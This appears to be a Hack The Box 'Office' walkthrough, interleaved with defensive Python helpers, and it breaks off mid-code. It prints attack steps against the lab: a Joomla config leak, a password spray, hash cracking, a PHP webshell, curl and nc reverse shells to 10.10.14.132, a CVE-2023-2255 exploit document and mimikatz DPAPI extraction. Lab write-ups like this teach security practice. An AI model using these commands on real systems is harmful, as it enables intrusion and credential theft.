Office
OS: Windows
Difficulty: Hard
Points: 40
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.10.11.3 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.11.3
Nmap scan report for 10.10.11.3
Host is up (0.078s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-title: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-08 00:30:15Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
54080/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54086/tcp open msrpc Microsoft Windows RPC
54112/tcp open msrpc Microsoft Windows RPC
63359/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: DC, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
Browsing to the web portal on port 80 shows that it runs Joomla, as the nmap scan also indicated.
We enumerate the version in use.
curl http://10.10.11.3/administrator/manifests/files/joomla.xml | grep version
<?xml version="1.0" encoding="UTF-8"?>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<version>4.2.7</version>
The version in use is 4.2.7, which has a registered CVE: an unauthenticated API information disclosure (CVE-2023-23752). Querying the following URL returns a password.
curl 'http://10.10.11.3/api/index.php/v1/config/application?public=true'
{"type":"application","id":"224","attributes":{"password":"H0lOgrams4reTakIng0Ver754!","id":224}
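As an added check (not code from the original write-up), the following Python script shows what a Joomla administrator auditing their own site would look for: whether the installed version falls in the range affected by CVE-2023-23752 and, given a response body from the config endpoint above, which sensitive attributes it exposes. The response body is a constructed sample in the Joomla 4 API envelope shape (the password value is the one disclosed above, the rest is made up); the version boundaries (4.0.0 to 4.2.7 affected, fixed in 4.2.8) are the published ones.

```python
import json

# CVE-2023-23752 affects Joomla 4.0.0 through 4.2.7; 4.2.8 closed the public config endpoint.
FIRST_AFFECTED = (4, 0, 0)
FIXED_IN = (4, 2, 8)

# Application-config attributes that must never be readable without authentication.
SENSITIVE_KEYS = {"password", "user", "db", "host", "dbprefix", "secret", "smtpuser", "smtppass"}


def parse_version(version: str) -> tuple:
    """Turn '4.2.7' into (4, 2, 7) so that versions compare numerically."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected_version(version: str) -> bool:
    """True for the unpatched 4.x range."""
    return FIRST_AFFECTED <= parse_version(version) < FIXED_IN


def _mask(value) -> str:
    """Keep only the first two characters so the audit output never stores the secret itself."""
    text = str(value)
    return text[:2] + "*" * (len(text) - 2)


def exposed_sensitive_attributes(body: str) -> dict:
    """Parse a /api/index.php/v1/config/application response and return the sensitive
    attributes it exposes (values masked). Accepts the normal {"data": [...]} envelope
    as well as a single resource object such as the one quoted in the write-up."""
    doc = json.loads(body)
    resources = doc.get("data", doc) if isinstance(doc, dict) else doc
    if isinstance(resources, dict):
        resources = [resources]
    exposed = {}
    for res in resources:
        if res.get("type") != "application":
            continue
        for key, value in res.get("attributes", {}).items():
            if key in SENSITIVE_KEYS:
                exposed[key] = _mask(value)
    return exposed


def audit(version: str, body: str) -> dict:
    """Combine the version check and the live-response check into one verdict."""
    exposed = exposed_sensitive_attributes(body)
    return {
        "affected_version": is_affected_version(version),
        "exposed_attributes": sorted(exposed),
        "leaks_secrets": bool(exposed),
    }


# Constructed sample response in the Joomla 4 API envelope shape.
SAMPLE_BODY = json.dumps({
    "links": {"self": "http://10.10.11.3/api/index.php/v1/config/application?public=true"},
    "data": [
        {"type": "application", "id": "224", "attributes": {"password": "H0lOgrams4reTakIng0Ver754!", "id": 224}},
        {"type": "application", "id": "225", "attributes": {"user": "root", "id": 225}},
        {"type": "application", "id": "226", "attributes": {"sitename": "Holography Industries", "id": 226}},
    ],
})

if __name__ == "__main__":
    print(audit("4.2.7", SAMPLE_BODY))
```

Run against a real site, the body would come from an authenticated or unauthenticated request to the same endpoint; an empty result on an affected version still means the upgrade is due, since the version check is the reliable signal.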
Kerbrute Enum
We also enumerate users with kerbrute.
/opt/windows/kerbrute userenum -d office.htb --dc 10.10.11.3 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
2024/06/07 12:56:03 > [+] VALID USERNAME: administrator@office.htb
2024/06/07 12:57:51 > [+] VALID USERNAME: Administrator@office.htb
2024/06/07 12:58:49 > [+] VALID USERNAME: ewhite@office.htb
2024/06/07 12:58:49 > [+] VALID USERNAME: etower@office.htb
2024/06/07 12:58:49 > [+] VALID USERNAME: dwolfe@office.htb
2024/06/07 12:58:50 > [+] VALID USERNAME: dmichael@office.htb
2024/06/07 12:58:50 > [+] VALID USERNAME: dlanor@office.htb
With those users we run a password spray using crackmapexec.
crackmapexec smb 10.10.11.3 -u users.txt -p 'H0lOgrams4reTakIng0Ver754!'
SMB 10.10.11.3 445 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.3 445 DC [-] office.htb\ewhite:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE
SMB 10.10.11.3 445 DC [-] office.htb\etower:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE
SMB 10.10.11.3 445 DC [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!
The password works for the user dwolfe.
dwolfe : H0lOgrams4reTakIng0Ver754!
SMB Enum
Using the credentials we see that there is a shared directory.
smbclient -L 10.10.11.3 -U dwolfe
Password for [WORKGROUP\dwolfe]:
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SOC Analysis    Disk
	SYSVOL          Disk      Logon server share
Entering the share, there is a pcap file that we can download.
smbclient '//10.10.11.3/SOC Analysis' -U dwolfe
smb: \> dir
. D 0 Wed May 10 14:52:24 2023
.. DHS 0 Wed Feb 14 05:18:31 2024
Latest-System-Dump-8fbc124d.pcap A 1372860 Sun May 7 20:59:00 2023
6265599 blocks of size 4096. 1210820 blocks available
smb: \> get Latest-System-Dump-8fbc124d.pcap
getting file \Latest-System-Dump-8fbc124d.pcap of size 1372860 as Latest-System-Dump-8fbc124d.pcap (635.7 KiloBytes/sec) (average 635.7 KiloBytes/sec)
Wireshark Analysis
After analyzing the file we find a couple of Kerberos packets containing a pre-auth hash that can potentially be cracked.
We follow this blog, which explains the method.
https://vbscrub.com/2020/02/27/getting-passwords-from-kerberos-pre-authentication-packets/
We copy out the hash information.
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
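For reference, an added Python helper (not part of the write-up) that breaks the `$krb5pa$18$` line above into its parts: etype, principal, realm and the encrypted PA-ENC-TIMESTAMP, which for the AES types is a 16-byte confounder plus the ASN.1 timestamp under AES-CTS, followed by a 12-byte HMAC-SHA1-96 tag. The salt is the RFC 3962 default (upper-case realm followed by the principal name); a KDC can override it through ETYPE-INFO2, which this helper does not handle. The cost each candidate password pays is one PBKDF2-HMAC-SHA1 run of 4096 iterations, which is why a dictionary word still falls in seconds while a long random password does not.

```python
import re

CONFOUNDER_LEN = 16  # random confounder block prepended before AES-CTS encryption
HMAC_LEN = 12        # HMAC-SHA1-96 tag appended by the aes*-cts-hmac-sha1-96 encryption types

# etype -> (RFC 3962 name, AES key length in bytes, hashcat mode for pre-auth timestamps)
AES_ETYPES = {
    17: ("aes128-cts-hmac-sha1-96", 16, 19800),
    18: ("aes256-cts-hmac-sha1-96", 32, 19900),
}

_KRB5PA = re.compile(
    r"^\$krb5pa\$(?P<etype>\d+)\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<edata>[0-9a-fA-F]+)$"
)

# The pre-auth line quoted in the write-up.
SAMPLE_HASH = (
    "$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d6"
    "7932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc"
)


def parse_krb5pa(line: str) -> dict:
    """Split a $krb5pa$ AES entry into its fields and sanity-check the ciphertext layout."""
    m = _KRB5PA.match(line.strip())
    if not m:
        raise ValueError("not a $krb5pa$ pre-auth entry")
    etype = int(m["etype"])
    if etype not in AES_ETYPES:
        raise ValueError(f"etype {etype} is not an AES pre-auth type handled here")
    name, key_len, mode = AES_ETYPES[etype]
    edata = bytes.fromhex(m["edata"])
    if len(edata) <= CONFOUNDER_LEN + HMAC_LEN:
        raise ValueError("encrypted timestamp too short to hold confounder + tag")
    return {
        "etype": etype,
        "cipher": name,
        "key_len": key_len,
        "hashcat_mode": mode,
        "user": m["user"],
        "realm": m["realm"],
        # RFC 3962 default salt: upper-case realm followed by the principal name.
        "salt": m["realm"].upper() + m["user"],
        # Both AES etypes derive the key with PBKDF2-HMAC-SHA1, 4096 iterations, then DK().
        "pbkdf2_iterations": 4096,
        "ciphertext": edata[:-HMAC_LEN],
        "hmac": edata[-HMAC_LEN:],
        "timestamp_plaintext_len": len(edata) - CONFOUNDER_LEN - HMAC_LEN,
    }


if __name__ == "__main__":
    info = parse_krb5pa(SAMPLE_HASH)
    print(f"{info['user']}@{info['realm']} {info['cipher']} plaintext={info['timestamp_plaintext_len']}B")
```

For the line above the plaintext works out to 28 bytes, which is exactly the DER encoding of PA-ENC-TS-ENC (a 15-byte KerberosTime plus the microseconds field), so the entry is structurally consistent before any cracking is attempted.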
Crack hash
Using hashcat we obtain the password.
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69
Joomla RCE
With those credentials we can log into Joomla.
administrator : playboy69
We can obtain RCE as follows.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla#rce
We browse to the following URL.
http://10.10.11.3/administrator/index.php?option=com_templates&view=template&id=223&file=Ly9lcnJvci5waHA%3D&isMedia=0
We edit the error.php file and save it.
system($_GET['cmd']);
Now we query our webshell.
http://10.10.11.3/templates/cassiopeia/error.php?cmd=whoami
Reverse shell
We run the following commands to get a reverse shell.
mkdir c:\temp
curl 10.10.14.132/nc64.exe -o c:\temp\nc.exe
c:\temp\nc.exe -e cmd.exe 10.10.14.132 1234
┌──(root㉿kali)-[~/htb/Box/Office]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.11.3] 51769
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\joomla\templates\cassiopeia>whoami
whoami
office\web_account
Lateral Movement
We find a local open port, 8083.
netstat -ano
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8083 0.0.0.0:0 LISTENING 1032
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2628
The port serves a web page.
c:\>curl localhost:8083
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="css/squarely.css">
<!--common.css -->
<link rel="stylesheet" href="css/common.css">
<title>Holography Industries</title>
</head>
<body>
The files of this web page are located in the following path.
dir c:\xampp\htdocs\internal
In the resume.php code we see that it stores odt files in the applications directory.
$extension = strtolower(end($ext));
$filesallowed = array('docm','docx','doc','odt');
if(in_array($extension,$filesallowed)){
    if ($fileerr === 0){
        if ($filesize < 5242880){
            $ff = "$rewritefn.$extension";
            $loc = "applications/".$ff;
            if(move_uploaded_file($filetmp,$loc))
            {
                // upload successful
                $notifi="<span class=notifi>✔ Upload Successful!</span><hr/><style>
                button, input , select, option, h3{
                    display:none;
                }
                </style>";
            } else {
LibreOffice (CVE-2023-2255)
Among the programs installed on the system we also find LibreOffice, version 5.2.
C:\> type "Program Files\Libre Office 5\readmes\readme_en-US.txt"
======================================================================
We hope you enjoy working with the new LibreOffice 5.2 and will join us online.
======================================================================
This version of LibreOffice is vulnerable to the following exploit.
https://github.com/elweth-sec/CVE-2023-2255
Therefore we can exploit the vulnerability by creating our file and dropping it in the applications directory.
┌──(root㉿kali)-[~/htb/Box/Office/CVE-2023-2255]
└─# python3 CVE-2023-2255.py --cmd "c:\temp\nc.exe -e cmd.exe 10.10.14.132 4444" --output 'doom.odt'
File doom.odt has been created !
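As an added example from the defensive side (not code from the write-up or from the CVE-2023-2255 repository), the Python below statically triages a file uploaded as an "ODT" before anything opens it, which is the check the resume.php handler above lacks (it trusts the extension alone and then hands the file to LibreOffice 5.2). It verifies that the file is a zip whose mimetype entry declares OpenDocument Text, lists embedded Basic macro libraries, counts ODF event bindings (a dom:load binding is how a macro runs on open) and pulls out links to external locations. The two sample documents are constructed in memory; the macro fixture carries an empty Sub Main only so that the detection path can be exercised.

```python
import io
import re
import zipfile

ODT_MIMETYPE = b"application/vnd.oasis.opendocument.text"
# ODF event bindings (e.g. script:event-name="dom:load") are what makes a macro run on open.
EVENT_LISTENER = re.compile(rb"<script:event-listener\b[^>]*>")
# Links that make the document fetch content from outside the file when it is rendered.
EXTERNAL_LINK = re.compile(rb'xlink:href="((?:https?|ftp|file|smb|\\\\)[^"]+)"')


def inspect_odt(data: bytes) -> dict:
    """Static triage of an uploaded 'ODT' without rendering it; 'risky' is the reject signal."""
    report = {"valid_zip": False, "declared_odt": False, "macro_files": [],
              "event_listeners": 0, "external_links": [], "risky": True}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return report  # not even a zip container: reject as-is
    names = zf.namelist()
    report["valid_zip"] = True
    if "mimetype" in names and zf.read("mimetype").strip() == ODT_MIMETYPE:
        report["declared_odt"] = True
    # Basic macro libraries live under Basic/ and are registered in META-INF/manifest.xml.
    report["macro_files"] = sorted(n for n in names if n.startswith("Basic/"))
    for name in names:
        if not name.endswith(".xml"):
            continue
        xml = zf.read(name)
        report["event_listeners"] += len(EVENT_LISTENER.findall(xml))
        report["external_links"] += [m.decode("utf-8", "replace") for m in EXTERNAL_LINK.findall(xml)]
    report["risky"] = (not report["declared_odt"] or bool(report["macro_files"])
                       or report["event_listeners"] > 0 or bool(report["external_links"]))
    return report


_CLEAN_CONTENT = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
    b'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0">'
    b'<office:body><office:text><text:p>Curriculum vitae</text:p></office:text></office:body>'
    b'</office:document-content>'
)

_MACRO_CONTENT = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
    b'xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" '
    b'xmlns:xlink="http://www.w3.org/1999/xlink">'
    b'<office:scripts><office:event-listeners>'
    b'<script:event-listener script:language="ooo:script" script:event-name="dom:load" '
    b'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document" '
    b'xlink:type="simple"/>'
    b'</office:event-listeners></office:scripts>'
    b'<office:body><office:text/></office:body></office:document-content>'
)

# Inert placeholder module: the library is present and auto-bound, but Main does nothing.
_MACRO_MODULE = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" '
    b'script:language="StarBasic">Sub Main\nEnd Sub</script:module>'
)


def build_sample_odt(with_macro: bool) -> bytes:
    """Constructed fixture: a minimal ODT zip, optionally with an auto-run macro binding."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # ODF requires the 'mimetype' entry first and stored uncompressed.
        zf.writestr(zipfile.ZipInfo("mimetype"), ODT_MIMETYPE, compress_type=zipfile.ZIP_STORED)
        if with_macro:
            zf.writestr("content.xml", _MACRO_CONTENT)
            zf.writestr("Basic/Standard/Module1.xml", _MACRO_MODULE)
        else:
            zf.writestr("content.xml", _CLEAN_CONTENT)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("clean", build_sample_odt(False)), ("macro", build_sample_odt(True))):
        print(label, inspect_odt(doc))
```

A handler that rejects anything `risky` here, stores uploads outside the web root and never has a desktop application open them automatically would have broken the chain used in this box at the upload step.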
We download our file onto the target.
curl 10.10.14.132/doom.odt -o doom.odt
c:\xampp\htdocs\internal\applications>curl 10.10.14.132/doom.odt -o doom.odt
curl 10.10.14.132/doom.odt -o doom.odt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 30529 100 30529 0 0 121k 0 --:--:-- --:--:-- --:--:-- 121k
c:\xampp\htdocs\internal\applications>dir
dir
Volume in drive C has no label.
Volume Serial Number is C626-9388
Directory of c:\xampp\htdocs\internal\applications
06/07/2024 08:33 PM <DIR> .
01/30/2024 09:39 AM <DIR> ..
06/07/2024 08:33 PM 30,529 doom.odt
1 File(s) 30,529 bytes
2 Dir(s) 4,918,906,880 bytes free
We wait a moment and get our reverse shell.
┌──(root㉿kali)-[~/htb/Box/Office]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.11.3] 51999
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice 5\program>whoami
whoami
office\ppotts
Privilege Escalation
We see that there are stored credentials.
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 5/9/2023 2:08 PM 358 18A1927A997A794B65E9849883AC3F3E
-a-hs- 5/9/2023 4:03 PM 398 84F1CAEEBF466550F4967858F9353FB4
-a-hs- 1/18/2024 11:53 AM 374 E76CCA3670CD9BB98DF79E0A8D176F1E
We also locate the master keys.
dir C:\Users\PPotts\AppData\Roaming\Microsoft\Protect
Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 6/7/2024 5:02 AM S-1-5-21-1199398058-4196589450-691661856-1107
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 1/17/2024 3:43 PM 740 10811601-0fa9-43c2-97e5-9bef8471fc7d
-a-hs- 5/2/2023 4:13 PM 740 191d3f9d-7959-4b4d-a520-a444853c47eb
-a-hs- 5/2/2023 4:13 PM 900 BK-OFFICE
-a-hs- 6/7/2024 5:02 AM 740 da923a1f-5364-4062-806c-9553f2d997e6
-a-hs- 6/7/2024 5:02 AM 24 Preferred
Using the following resource we can extract passwords.
DPAPI Credentials
To access those credentials we will use mimikatz.
c:\temp>curl 10.10.14.132/mimikatz.exe -o mimikatz.exe
curl 10.10.14.132/mimikatz.exe -o mimikatz.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1220k 100 1220k 0 0 859k 0 0:00:01 0:00:01 --:--:-- 859k
mimikatz # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\credentials\84F1CAEEBF466550F4967858F9353FB4
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 649c4466d5d647dd2c595f4e43fb7e1d
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 32e88dfd1927fdef0ede5abf2c024e3a
dwDataLen : 000000c0 - 192
pbData : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
dwSignLen : 00000014 - 20
pbSign : 21bfb22ca38e0a802e38065458cecef00b450976
We extract and decrypt the master key.
dpapi::masterkey /in:C:\Users\PPotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107
[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
sha1: 85285eb368befb1670633b05ce58ca4d75c73c77
We extract the password with the master key.
dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4" /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 5/9/2023 11:03:21 PM
unkFlagsOrSize : 00000018 - 24
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=OFFICE\HHogan
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : OFFICE\HHogan
CredentialBlob : H4ppyFtW183#
Attributes : 0
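An added Python example (not from the write-up or from mimikatz) that parses the DPAPI_BLOB header in the same field order mimikatz prints it, so that the master key GUID a credential file depends on can be read out and mapped to the file under Protect\<SID>\ without decrypting anything; that mapping is the step between the two mimikatz commands above. The fixture is rebuilt from the header values printed above; pbData and pbSign are constructed placeholders of the right length, and the parser expects the blob itself, not the credential file's own short header in front of it.

```python
import struct
import uuid

DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"  # fixed provider GUID in every blob
CRYPTPROTECT_SYSTEM = 0x20000000                              # the "system" flag mimikatz prints
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}
ALG_KEY_BITS = {0x6603: 192, 0x6610: 256, 0x8004: 160, 0x800E: 512}


def _lv(data: bytes) -> bytes:
    """DWORD length prefix followed by the bytes (the layout of every variable field)."""
    return struct.pack("<I", len(data)) + data


def _take_u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _take_lv(buf, off):
    n, off = _take_u32(buf, off)
    if off + n > len(buf):
        raise ValueError("truncated DPAPI blob")
    return bytes(buf[off:off + n]), off + n


def _take_guid(buf, off):
    # GUIDs are stored in Windows little-endian layout.
    return str(uuid.UUID(bytes_le=bytes(buf[off:off + 16]))), off + 16


def parse_dpapi_blob(buf: bytes) -> dict:
    """Walk the DPAPI_BLOB header in the order mimikatz prints it."""
    off = 0
    version, off = _take_u32(buf, off)
    if version != 1:
        raise ValueError(f"unexpected dwVersion {version}")
    provider, off = _take_guid(buf, off)
    mk_version, off = _take_u32(buf, off)
    mk_guid, off = _take_guid(buf, off)
    flags, off = _take_u32(buf, off)
    desc_raw, off = _take_lv(buf, off)
    alg_crypt, off = _take_u32(buf, off)
    alg_crypt_len, off = _take_u32(buf, off)
    salt, off = _take_lv(buf, off)
    hmac_key, off = _take_lv(buf, off)
    alg_hash, off = _take_u32(buf, off)
    alg_hash_len, off = _take_u32(buf, off)
    hmac2_key, off = _take_lv(buf, off)
    data, off = _take_lv(buf, off)
    sign, off = _take_lv(buf, off)
    return {
        "provider_guid": provider,
        "master_key_guid": mk_guid,
        "master_key_version": mk_version,
        "system_flag": bool(flags & CRYPTPROTECT_SYSTEM),
        "description": desc_raw.decode("utf-16-le", "replace").rstrip("\x00\r\n"),
        "description_len": len(desc_raw),
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_crypt_bits": alg_crypt_len,
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "alg_hash_bits": alg_hash_len,
        "salt": salt.hex(),
        "hmac_key_len": len(hmac_key),
        "hmac2_key": hmac2_key.hex(),
        "data_len": len(data),
        "sign_len": len(sign),
        "trailing_bytes": len(buf) - off,
    }


def build_dpapi_blob(master_key_guid, description, alg_crypt, alg_hash, salt, hmac2_key, data, sign,
                     flags=CRYPTPROTECT_SYSTEM) -> bytes:
    """Serialise a blob header (inverse of parse_dpapi_blob) to produce fixtures."""
    # "Enterprise Credential Data" + CRLF + UTF-16 terminator is 58 bytes, matching the 0x3a
    # dwDescriptionLen printed above (assumption about how the length arises).
    desc = (description + "\r\n").encode("utf-16-le") + b"\x00\x00"
    return (struct.pack("<I", 1) + uuid.UUID(DPAPI_PROVIDER_GUID).bytes_le
            + struct.pack("<I", 1) + uuid.UUID(master_key_guid).bytes_le
            + struct.pack("<I", flags) + _lv(desc)
            + struct.pack("<II", alg_crypt, ALG_KEY_BITS[alg_crypt]) + _lv(salt) + _lv(b"")
            + struct.pack("<II", alg_hash, ALG_KEY_BITS[alg_hash]) + _lv(hmac2_key)
            + _lv(data) + _lv(sign))


def master_key_path(profile_dir: str, user_sid: str, master_key_guid: str) -> str:
    """Where the per-user master key file named in the blob lives (roaming profile layout)."""
    return f"{profile_dir}\\AppData\\Roaming\\Microsoft\\Protect\\{user_sid}\\{master_key_guid}"


# Fixture from the header values printed above; pbData/pbSign are constructed placeholders
# of the right length (192 and 20 bytes), not the real ciphertext.
SAMPLE_BLOB = build_dpapi_blob(
    master_key_guid="191d3f9d-7959-4b4d-a520-a444853c47eb",
    description="Enterprise Credential Data",
    alg_crypt=0x6603, alg_hash=0x8004,
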